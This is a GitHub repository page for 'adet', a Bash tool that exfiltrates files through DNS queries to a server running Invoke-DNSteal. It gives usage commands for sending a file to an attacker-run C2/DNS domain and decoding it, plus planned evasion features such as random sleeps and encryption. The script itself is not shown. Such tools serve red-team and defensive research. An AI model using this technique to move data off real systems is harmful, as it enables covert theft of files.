Skip to content
/ adet Public

Bash script for DNS file exfiltration using Invoke-DNSteal in server side.

Notifications You must be signed in to change notification settings

lobuhi/adet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 

Repository files navigation

adet: Another DNS Exfiltration Tool

Bash script for DNS file exfiltration using Invoke-DNSteal in server side.

Instructions:

  1. Run Invoke-DNSteal.py in your DNS server
  2. Use:
./adet.sh <file> <domain>
  1. Decode the received file in base64
base64 -d <received_file>

Example: Sending byp4xx.py to my own customized C2/DNS server

TO-DO:

  • Add random sleep option
  • Add random domain when DNS server is specified
  • Add byte length option
  • Add TCP option
  • Add encryption? Why not?

About

Bash script for DNS file exfiltration using Invoke-DNSteal in server side.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages